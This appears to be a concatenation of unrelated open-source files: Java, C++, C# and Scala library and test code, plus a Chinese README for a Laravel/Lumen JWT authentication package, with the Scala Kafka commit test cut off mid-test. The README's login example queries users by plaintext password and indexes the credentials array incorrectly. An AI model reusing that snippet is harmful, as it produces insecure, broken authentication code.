* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.asakusafw.compiler.batch;
import com.asakusafw.compiler.batch.batch.JobFlow1;
import com.asakusafw.vocabulary.batch.Batch;
import com.asakusafw.vocabulary.batch.BatchDescription;
/**
* A batch class which is not public.
*/
@Batch(name = "testing")
class NotPublic extends BatchDescription {
@Override
protected void describe() {
run(JobFlow1.class).soon();
}
}
| cocoatomo/asakusafw | mapreduce/compiler/core/src/test/java/com/asakusafw/compiler/batch/NotPublic.java | Java | apache-2.0 | 1,012 |
# 注意!!!
由于该库的主要目的是JWT的实现原理的技术分享,而我目前忙于公司的Android项目,暂没有时间维护当前扩展包(对Laravel5.4的兼容性不好),并且扩展包稳定性还有待验证,不推荐使用到正式环境。
所以我推荐大家使用 https://github.com/tymondesigns/jwt-auth :),如果你有JWT相关不懂的,可以提issue,大家一起探讨。
如果你想学习JWT的实现原理,我相信本项目应该会带给你一些帮助:),配合专栏食用更佳 https://zhuanlan.zhihu.com/p/22531819
# jwt-auth [](https://badge.fury.io/ph/lsxiao%2Fjwt-auth)
Laravel/Lumen JSON Web Token 认证扩展包
## 待完成
- [ ] 更加详细的单元测试
- [ ] 命令行生成HMAC RSA 秘钥
## 引入jwt-auth到项目中
```bash
composer require "lsxiao/jwt-auth"
```
## 使用方法
### 配置jwt-auth
#### Laravel
```bash
php artisan vendor:publish
```
jwt.php配置文件会被拷贝到项目根目录的config文件夹中
#### Lumen
在项目的lumen项目的根目录创建config文件夹,将```jwt.php```配置文件复制到此处
```php
<?php
return [
/*
|--------------------------------------------------------------------------
| HMAC 签名秘钥
|--------------------------------------------------------------------------
|
| HMAC 签名秘钥是用来为token进行HMAC签名的,必须在.env文件中设置。
|
*/
'secret_key' => env('JWT_SECRET_KEY'),
/*
|--------------------------------------------------------------------------
| RSA 签名私钥
|--------------------------------------------------------------------------
|
| RSA 签名私钥是用来为token进行RSA签名的,必须在.env文件中设置。
|
*/
'private_secret_key' => env('JWT_PRIVATE_SECRET_KEY'),
/*
|--------------------------------------------------------------------------
| RSA 签名公钥
|--------------------------------------------------------------------------
|
| RSA 签名公钥是用来为token进行RSA签名解密的,必须在.env文件中设置。
|
*/
'public_secret_key' => env('JWT_PUBLIC_SECRET_KEY'),
/*
|--------------------------------------------------------------------------
| Token 有效期
|--------------------------------------------------------------------------
|
| 指定token的有效时间(单位分钟),默认1小时。
|
*/
'ttl' => env('JWT_TTL', 60),
/*
|--------------------------------------------------------------------------
| Token 刷新有效期
|--------------------------------------------------------------------------
|
| 指定token过期后,多长一段时间内,使用过期的token能够刷新。默认为3周
|
*/
'refresh_ttl' => env('JWT_REFRESH_TTL', 30240),
/*
|--------------------------------------------------------------------------
| JWT 算法ID
|--------------------------------------------------------------------------
|
| Token HMAC签名的HASH算法
| 对称算法:
| HS256, HS384, HS512
| 非对称算法,需提供公私钥:
| RS256, RS384, RS512
*/
'algorithm_id' => env('JWT_ALGORITHM', \Lsxiao\JWT\Singer\HMAC::DEFAULT_ALGO_ID),
/*
|--------------------------------------------------------------------------
| 指定Token在某时间之前无法使用
|--------------------------------------------------------------------------
|
| 指定一个时间增量(单位秒),在此签发时间+此事件增量时间之前,Token都不能使用
|
*/
'not_before=>' => env('JWT_NOT_BEFORE', 0),
/*
|--------------------------------------------------------------------------
| 刷新Token次数差值
|--------------------------------------------------------------------------
|
| 最新刷新次数会缓存在Server,如果客户端的token刷新次数与Server缓存相差大于此值,就会判定无效Token
|
*/
'refresh_diff_limit=>' => env('JWT_REFRESH_DIFF_LIMIT', 2),
/*
|--------------------------------------------------------------------------
| 黑名单宽限时间,单位秒
|--------------------------------------------------------------------------
|
| 每次刷新后,Token会被加入黑名单,在高并发的情况下,后续请求Token会无效,当设置宽限时间后,
| Token刷新后,加入黑名单的Token只要处于宽限时间内,则是有效的。
|
*/
'blacklist_grace_time' => env('JWT_BLACK_LIST_GRACE_TIME', 30)
];
```
### 配置auth
#### Laravel
在config文件夹中找到auth.php
#### Lumen
将```auth.php```配置文件复制到config文件夹
修改如下:
```php
<?php
return [
'defaults' => [
'guard' => env('AUTH_GUARD', 'api'),
],
'guards' => [
'api' => ['driver' => 'jwt'],//这里必须是jwt,由JWTGuard驱动
],
'providers' => [
//
],
];
```
### 开启认证
修改 bootstrap/app.php,取消 auth middleware 及 AuthServiceProvider 的注释
修改 app/Providers/AuthServiceProvider.php 的 boot 方法:
```php
public function boot()
{
$this->app->configure('jwt');
$this->app['auth']->viaRequest('api', function ($request) {
$token = \Lsxiao\JWT\Token::fromRequest($request);
if (!empty($token) && $token->isValid()) {
$userid = $token->getClaim('sub')->getValue();
return User::find($userid);
}
});
}
```
### 用户类
用户类 User 需要确认已实现 \Illuminate\Contracts\Auth\Authenticatable 接口,默认的 User 类即可
### 在Controller中根据账号密码获取Token
```php
public function login(Request $request)
{
//通过user返回一个Token
$credentials = $request->only('email', 'password');
$user = User::where('email', $credentials[0])->where('password', $credentials[1])->first();
$token = \Lsxiao\JWT\Token::fromUser($user);
return response()->json(['token' => $token]);
}
```
### 在需要的地方刷新Token
Controller 中
```php
public function login(Request $request)
{
//从请求取出证书,也就是邮件密码
$token = \Lsxiao\JWT\Token::refreshToken($request);
if (!$token) {
throw new TokenInvalidException("refresh failed");
}
return response()->json(['token' => $token]);
}
```
Middleware 中
```php
public function handle($request, Closure $next, $guard = null)
{
if ($this->auth->guard($guard)->guest()) {
return response('Unauthorized.', 401);
}
$response = $next($request);
// RefreshToken : reset HTTP Response Header
\Lsxiao\JWT\Token::refreshToken($request, $response);
return $response;
}
```
### 需要处理的异常
所有异常都继承自`Lsxiao\JWT\Exception\BaseJWTException`,建议在`App\Exceptions\Handler`处理异常,返回不同的HTTP status code
- `Lsxiao\JWT\Exception\SecretKeyException` 秘钥在.evn文件中不存在,秘钥不符合规范等
- `Lsxiao\JWT\Exception\TokenExpiredException` Token 过期
- `Lsxiao\JWT\Exception\TokenInvalidException` Token 无效
- `Lsxiao\JWT\Exception\TokenNotInRequestException` Token不存在于Request QueryParam或者Body或者Header中
- `Lsxiao\JWT\Exception\TokenParseException` token解析异常
- `Lsxiao\JWT\Exception\UnauthorizedException` 未授权异常
## 版本说明
- 1.0.4 (2016-11-21)
- 修复hasBlacklistGraceTimeOrNotInBlacklist函数的bug。
- 1.0.3 (2016-11-21)
- 修复Auth::refreshToken方法不能刷新成功的严重BUG
- 1.0.2 (2016-10-28)
- 支持Laravel,提供LaravelServiceProvider
- 1.0.1 (2016-10-28)
- 修复获取用户的时候没进行身份认证的BUG
- 1.0 (2016-9-29)
- jwt基本功能提交
## 维护人
知乎 : [@面条](https://www.zhihu.com/people/lsxiao)
Github : [@lsxiao](https://github.com/lsxiao)
## 开源许可
Copyright 2016 lsxiao, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
| lsxiao/jwt-auth | README.md | Markdown | apache-2.0 | 8,595 |
package com.google.api.ads.dfp.jaxws.v201511;
import javax.xml.bind.annotation.XmlEnum;
import javax.xml.bind.annotation.XmlType;
/**
* <p>Java class for CustomTargetingValue.Status.
*
* <p>The following schema fragment specifies the expected content contained within this class.
* <p>
* <pre>
* <simpleType name="CustomTargetingValue.Status">
* <restriction base="{http://www.w3.org/2001/XMLSchema}string">
* <enumeration value="ACTIVE"/>
* <enumeration value="INACTIVE"/>
* <enumeration value="UNKNOWN"/>
* </restriction>
* </simpleType>
* </pre>
*
*/
@XmlType(name = "CustomTargetingValue.Status")
@XmlEnum
public enum CustomTargetingValueStatus {
/**
*
* The object is active.
*
*
*/
ACTIVE,
/**
*
* The object is no longer active.
*
*
*/
INACTIVE,
/**
*
* The value returned if the actual value is not exposed by the requested
* API version.
*
*
*/
UNKNOWN;
public String value() {
return name();
}
public static CustomTargetingValueStatus fromValue(String v) {
return valueOf(v);
}
}
| gawkermedia/googleads-java-lib | modules/dfp_appengine/src/main/java/com/google/api/ads/dfp/jaxws/v201511/CustomTargetingValueStatus.java | Java | apache-2.0 | 1,306 |
/* ###
* IP: GHIDRA
* REVIEWED: YES
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package ghidra.app.plugin.core.compositeeditor;
/**
* Composite Viewer Model component selection change listener interface.
*/
public interface CompositeModelSelectionListener {
/**
* Called to indicate the model's component selection has changed.
*/
void selectionChanged();
}
| NationalSecurityAgency/ghidra | Ghidra/Features/Base/src/main/java/ghidra/app/plugin/core/compositeeditor/CompositeModelSelectionListener.java | Java | apache-2.0 | 904 |
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
#include <aws/ec2/model/DescribeInstancesResponse.h>
#include <aws/core/utils/xml/XmlSerializer.h>
#include <aws/core/AmazonWebServiceResult.h>
#include <aws/core/utils/StringUtils.h>
#include <aws/core/utils/logging/LogMacros.h>
#include <utility>
using namespace Aws::EC2::Model;
using namespace Aws::Utils::Xml;
using namespace Aws::Utils::Logging;
using namespace Aws::Utils;
using namespace Aws;
DescribeInstancesResponse::DescribeInstancesResponse()
{
}
DescribeInstancesResponse::DescribeInstancesResponse(const Aws::AmazonWebServiceResult<XmlDocument>& result)
{
*this = result;
}
DescribeInstancesResponse& DescribeInstancesResponse::operator =(const Aws::AmazonWebServiceResult<XmlDocument>& result)
{
const XmlDocument& xmlDocument = result.GetPayload();
XmlNode rootNode = xmlDocument.GetRootElement();
XmlNode resultNode = rootNode;
if (!rootNode.IsNull() && (rootNode.GetName() != "DescribeInstancesResponse"))
{
resultNode = rootNode.FirstChild("DescribeInstancesResponse");
}
if(!resultNode.IsNull())
{
XmlNode reservationsNode = resultNode.FirstChild("reservationSet");
if(!reservationsNode.IsNull())
{
XmlNode reservationsMember = reservationsNode.FirstChild("item");
while(!reservationsMember.IsNull())
{
m_reservations.push_back(reservationsMember);
reservationsMember = reservationsMember.NextNode("item");
}
}
XmlNode nextTokenNode = resultNode.FirstChild("nextToken");
if(!nextTokenNode.IsNull())
{
m_nextToken = StringUtils::Trim(nextTokenNode.GetText().c_str());
}
}
if (!rootNode.IsNull()) {
XmlNode requestIdNode = rootNode.FirstChild("requestId");
if (!requestIdNode.IsNull())
{
m_responseMetadata.SetRequestId(StringUtils::Trim(requestIdNode.GetText().c_str()));
}
AWS_LOGSTREAM_DEBUG("Aws::EC2::Model::DescribeInstancesResponse", "x-amzn-request-id: " << m_responseMetadata.GetRequestId() );
}
return *this;
}
| JoyIfBam5/aws-sdk-cpp | aws-cpp-sdk-ec2/source/model/DescribeInstancesResponse.cpp | C++ | apache-2.0 | 2,558 |
/*
* This file is part of "lunisolar-magma".
*
* (C) Copyright 2014-2022 Lunisolar (http://lunisolar.eu/).
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package eu.lunisolar.magma.asserts.func.function.to;
import eu.lunisolar.magma.asserts.func.FunctionalAttest.AssertionsCheck;
import eu.lunisolar.magma.asserts.func.FunctionalAttest.SemiEvaluation;
import eu.lunisolar.magma.func.supp.Be;
import eu.lunisolar.magma.asserts.func.FunctionalAttest;
import eu.lunisolar.magma.asserts.func.FunctionalAttest.*;
import javax.annotation.Nonnull; // NOSONAR
import javax.annotation.Nullable; // NOSONAR
import eu.lunisolar.magma.func.supp.check.Checks; // NOSONAR
import eu.lunisolar.magma.basics.meta.*; // NOSONAR
import eu.lunisolar.magma.basics.meta.functional.*; // NOSONAR
import eu.lunisolar.magma.basics.meta.functional.type.*; // NOSONAR
import eu.lunisolar.magma.basics.meta.functional.domain.*; // NOSONAR
import eu.lunisolar.magma.func.action.*; // NOSONAR
import java.util.function.*;
import eu.lunisolar.magma.func.function.to.*;
import eu.lunisolar.magma.func.action.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.bi.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.obj.*; // NOSONAR
import eu.lunisolar.magma.func.consumer.primitives.tri.*; // NOSONAR
import eu.lunisolar.magma.func.function.*; // NOSONAR
import eu.lunisolar.magma.func.function.conversion.*; // NOSONAR
import eu.lunisolar.magma.func.function.from.*; // NOSONAR
import eu.lunisolar.magma.func.function.to.*; // NOSONAR
import eu.lunisolar.magma.func.operator.binary.*; // NOSONAR
import eu.lunisolar.magma.func.operator.ternary.*; // NOSONAR
import eu.lunisolar.magma.func.operator.unary.*; // NOSONAR
import eu.lunisolar.magma.func.predicate.*; // NOSONAR
import eu.lunisolar.magma.func.supplier.*; // NOSONAR
import eu.lunisolar.magma.func.function.to.LToIntBiFunction.*;
/** Assert class for LToIntObj1Obj0Func. */
public final class LToIntObj1Obj0FuncAttest<T2, T1> extends FunctionalAttest.Full<LToIntObj1Obj0FuncAttest<T2, T1>, LToIntObj1Obj0Func<T2, T1>, LBiConsumer<T2, T1>, Checks.CheckInt> {
public LToIntObj1Obj0FuncAttest(LToIntObj1Obj0Func<T2, T1> actual) {
super(actual);
}
@Nonnull
public static <T2, T1> LToIntObj1Obj0FuncAttest<T2, T1> attestToIntObj1Obj0Func(LToIntBiFunction.LToIntObj1Obj0Func<T2, T1> func) {
return new LToIntObj1Obj0FuncAttest(func);
}
@Nonnull
public IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>> doesApplyAsInt(T2 a2, T1 a1) {
return new IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>>(this, () -> String.format("(%s,%s)", a2, a1), (desc, pc) -> {
var func = value();
Checks.check(func).must(Be::notNull, "Actual function is null.");
if (pc != null) {
pc.accept(a2, a1);
}
var result = func.applyAsIntObj1Obj0(a2, a1);
return Checks.attest(result, desc);
}, recurringAssert);
}
}
| lunisolar/magma | magma-asserts/src/main/java/eu/lunisolar/magma/asserts/func/function/to/LToIntObj1Obj0FuncAttest.java | Java | apache-2.0 | 3,567 |
// [[[[INFO>
// Copyright 2015 Epicycle (http://epicycle.org, https://github.com/open-epicycle)
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// For more information check https://github.com/open-epicycle/Epicycle.Input-cs
// ]]]]
using NUnit.Framework;
namespace Epicycle.Input.Keyboard
{
[TestFixture]
public class KeyEventArgsTest
{
[Test]
public void ctor_sets_properties_correctly()
{
var eventArgs = new KeyEventArgs<int, int>(123, KeyEventType.Released, 234);
Assert.That(eventArgs.KeyId, Is.EqualTo(123));
Assert.That(eventArgs.EventType, Is.EqualTo(KeyEventType.Released));
Assert.That(eventArgs.AdditionalData, Is.EqualTo(234));
}
}
}
| open-epicycle/Epicycle.Input-cs | projects/Epicycle.Input_cs-Test/Keyboard/KeyEventArgsTest.cs | C# | apache-2.0 | 1,266 |
/*
* Copyright (C) 2014 - 2016 Softwaremill <http://softwaremill.com>
* Copyright (C) 2016 - 2019 Lightbend Inc. <http://www.lightbend.com>
*/
package akka.kafka.internal
import akka.Done
import akka.actor.ActorSystem
import akka.kafka.ConsumerMessage._
import akka.kafka.{internal, CommitterSettings, ConsumerSettings, Subscriptions}
import akka.kafka.scaladsl.{Committer, Consumer}
import akka.kafka.scaladsl.Consumer.Control
import akka.kafka.tests.scaladsl.LogCapturing
import akka.stream._
import akka.stream.scaladsl._
import akka.stream.testkit.scaladsl.StreamTestKit.assertAllStagesStopped
import akka.stream.testkit.scaladsl.TestSink
import akka.testkit.TestKit
import org.apache.kafka.clients.consumer._
import org.apache.kafka.common.TopicPartition
import org.apache.kafka.common.serialization.StringDeserializer
import org.scalatest.concurrent.ScalaFutures
import org.scalatest.{BeforeAndAfterAll, FlatSpecLike, Matchers}
import scala.jdk.CollectionConverters._
import scala.collection.immutable.Seq
import scala.concurrent.duration._
import scala.concurrent.{Await, Future}
object CommittingWithMockSpec {
type K = String
type V = String
type Record = ConsumerRecord[K, V]
def createMessage(seed: Int): CommittableMessage[K, V] = createMessage(seed, "topic")
def createMessage(seed: Int,
topic: String,
groupId: String = "group1",
metadata: String = ""): CommittableMessage[K, V] = {
val offset = PartitionOffset(GroupTopicPartition(groupId, topic, 1), seed.toLong)
val record = new ConsumerRecord(offset.key.topic, offset.key.partition, offset.offset, seed.toString, seed.toString)
CommittableMessage(record, CommittableOffsetImpl(offset, metadata)(null))
}
def toRecord(msg: CommittableMessage[K, V]): ConsumerRecord[K, V] = msg.record
}
class CommittingWithMockSpec(_system: ActorSystem)
extends TestKit(_system)
with FlatSpecLike
with Matchers
with BeforeAndAfterAll
with ScalaFutures
with LogCapturing {
import CommittingWithMockSpec._
implicit val patience: PatienceConfig = PatienceConfig(15.seconds, 1.second)
def this() = this(ActorSystem())
override def afterAll(): Unit =
shutdown(system)
implicit val m = ActorMaterializer(ActorMaterializerSettings(_system).withFuzzing(true))
implicit val ec = _system.dispatcher
val messages = (1 to 1000).map(createMessage)
def checkMessagesReceiving(msgss: Seq[Seq[CommittableMessage[K, V]]]): Unit = {
val mock = new ConsumerMock[K, V]()
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
probe.request(msgss.map(_.size).sum.toLong)
msgss.foreach(chunk => mock.enqueue(chunk.map(toRecord)))
probe.expectNextN(msgss.flatten)
Await.result(control.shutdown(), remainingOrDefault)
}
def createCommittableSource(mock: Consumer[K, V],
groupId: String = "group1",
topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] =
Consumer.committableSource(
ConsumerSettings
.create(system, new StringDeserializer, new StringDeserializer)
.withGroupId(groupId)
.withConsumerFactory(_ => mock),
Subscriptions.topics(topics)
)
def createSourceWithMetadata(mock: Consumer[K, V],
metadataFromRecord: ConsumerRecord[K, V] => String,
groupId: String = "group1",
topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] =
Consumer.commitWithMetadataSource(
ConsumerSettings
.create(system, new StringDeserializer, new StringDeserializer)
.withGroupId(groupId)
.withCloseTimeout(ConsumerMock.closeTimeout)
.withConsumerFactory(_ => mock),
Subscriptions.topics(topics),
metadataFromRecord
)
it should "commit metadata in message" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString)
.toMat(TestSink.probe)(Keep.both)
.run()
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
probe.request(100)
val done = probe.expectNext().committableOffset.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val (topicPartition, offsetMeta) = commitLog.calls.head._1.head
topicPartition.topic should ===(msg.record.topic())
topicPartition.partition should ===(msg.record.partition())
// committed offset should be the next message the application will consume, i.e. +1
offsetMeta.offset should ===(msg.record.offset() + 1)
offsetMeta.metadata should ===(msg.record.offset.toString)
//emulate commit
commitLog.calls.head match {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "call commitAsync for commit message and then complete future" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
probe.request(100)
val done = probe.expectNext().committableOffset.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val (topicPartition, offsetMeta) = commitLog.calls.head._1.head
topicPartition.topic should ===(msg.record.topic())
topicPartition.partition should ===(msg.record.partition())
// committed offset should be the next message the application will consume, i.e. +1
offsetMeta.offset should ===(msg.record.offset() + 1)
//emulate commit
commitLog.calls.head match {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "fail future in case of commit fail" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
val msg = createMessage(1)
mock.enqueue(List(toRecord(msg)))
probe.request(100)
val done = probe.expectNext().committableOffset.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
//emulate commit failure
val failure = new Exception()
commitLog.calls.head match {
case (offsets, callback) => callback.onComplete(null, failure)
}
intercept[Exception] {
Await.result(done, remainingOrDefault)
} should be(failure)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "collect commits to be sent to commitAsync" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock)
.toMat(TestSink.probe)(Keep.both)
.run()
val count = 100
val msgs = (1 to count).map(createMessage)
mock.enqueue(msgs.map(toRecord))
probe.request(count.toLong)
val allCommits = Future.sequence(probe.expectNextN(count.toLong).map(_.committableOffset.commitInternal()))
withClue("the commits are aggregated to a low number of calls to commitAsync:") {
awaitAssert {
val callsToCommitAsync = commitLog.calls.size
callsToCommitAsync should be >= 1
callsToCommitAsync should be < count / 10
}
}
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
allCommits.futureValue should have size (count.toLong)
control.shutdown().futureValue shouldBe Done
}
it should "support commit batching" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createCommittableSource(mock.mock, topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
val done = batch.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "support commit batching with metadata" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock,
(rec: ConsumerRecord[K, V]) => rec.offset.toString,
topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
val done = batch.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
it should "support merging commit batches with metadata" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock,
(rec: ConsumerRecord[K, V]) => rec.offset.toString,
topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
val batch = probe
.expectNextN(6)
.map(_.committableOffset)
.grouped(2)
.map(_.foldLeft(CommittableOffsetBatch.empty)(_ updated _))
.foldLeft(CommittableOffsetBatch.empty)(_ updated _)
val done = batch.commitInternal()
awaitAssert {
commitLog.calls should have size (1)
}
val commitMap = commitLog.calls.head._1
commitMap(new TopicPartition("topic1", 1)).offset should ===(msgsTopic1.last.record.offset() + 1)
commitMap(new TopicPartition("topic2", 1)).offset should ===(msgsTopic2.last.record.offset() + 1)
commitMap(new TopicPartition("topic1", 1)).metadata() should ===(msgsTopic1.last.record.offset().toString)
commitMap(new TopicPartition("topic2", 1)).metadata() should ===(msgsTopic2.last.record.offset().toString)
//emulate commit
commitLog.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done, remainingOrDefault)
Await.result(control.shutdown(), remainingOrDefault)
}
//FIXME looks like current implementation of batch committer is incorrect
it should "support commit batching from more than one stage" in assertAllStagesStopped {
val commitLog1 = new ConsumerMock.LogHandler()
val commitLog2 = new ConsumerMock.LogHandler()
val mock1 = new ConsumerMock[K, V](commitLog1)
val mock2 = new ConsumerMock[K, V](commitLog2)
val (control1, probe1) = createCommittableSource(mock1.mock, "group1", Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val (control2, probe2) = createCommittableSource(mock2.mock, "group2", Set("topic1", "topic3"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgs1a = (1 to 3).map(createMessage(_, "topic1", "group1"))
val msgs1b = (11 to 13).map(createMessage(_, "topic2", "group1"))
mock1.enqueue(msgs1a.map(toRecord))
mock1.enqueue(msgs1b.map(toRecord))
val msgs2a = (1 to 3).map(createMessage(_, "topic1", "group2"))
val msgs2b = (11 to 13).map(createMessage(_, "topic3", "group2"))
mock2.enqueue(msgs2a.map(toRecord))
mock2.enqueue(msgs2b.map(toRecord))
probe1.request(100)
probe2.request(100)
val batch1 = probe1
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(CommittableOffsetBatch.empty)(_.updated(_))
val batch2 = probe2
.expectNextN(6)
.map(_.committableOffset)
.foldLeft(batch1)(_.updated(_))
val done2 = batch2.commitInternal()
awaitAssert {
commitLog1.calls should have size (1)
commitLog2.calls should have size (1)
}
val commitMap1 = commitLog1.calls.head._1
commitMap1(new TopicPartition("topic1", 1)).offset should ===(msgs1a.last.record.offset() + 1)
commitMap1(new TopicPartition("topic2", 1)).offset should ===(msgs1b.last.record.offset() + 1)
val commitMap2 = commitLog2.calls.head._1
commitMap2(new TopicPartition("topic1", 1)).offset should ===(msgs2a.last.record.offset() + 1)
commitMap2(new TopicPartition("topic3", 1)).offset should ===(msgs2b.last.record.offset() + 1)
//emulate commit
commitLog1.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
commitLog2.calls.foreach {
case (offsets, callback) => callback.onComplete(offsets.asJava, null)
}
Await.result(done2, remainingOrDefault)
Await.result(control1.shutdown(), remainingOrDefault)
Await.result(control2.shutdown(), remainingOrDefault)
}
// Same logic as "support commit batching with metadata" above
"Tell committing" should "support commit batching with metadata" in assertAllStagesStopped {
val commitLog = new ConsumerMock.LogHandler()
val mock = new ConsumerMock[K, V](commitLog)
val (control, probe) = createSourceWithMetadata(mock.mock,
(rec: ConsumerRecord[K, V]) => rec.offset.toString,
topics = Set("topic1", "topic2"))
.toMat(TestSink.probe)(Keep.both)
.run()
val msgsTopic1 = (1 to 3).map(createMessage(_, "topic1"))
val msgsTopic2 = (11 to 13).map(createMessage(_, "topic2"))
mock.enqueue(msgsTopic1.map(toRecord))
mock.enqueue(msgsTopic2.map(toRecord))
probe.request(100)
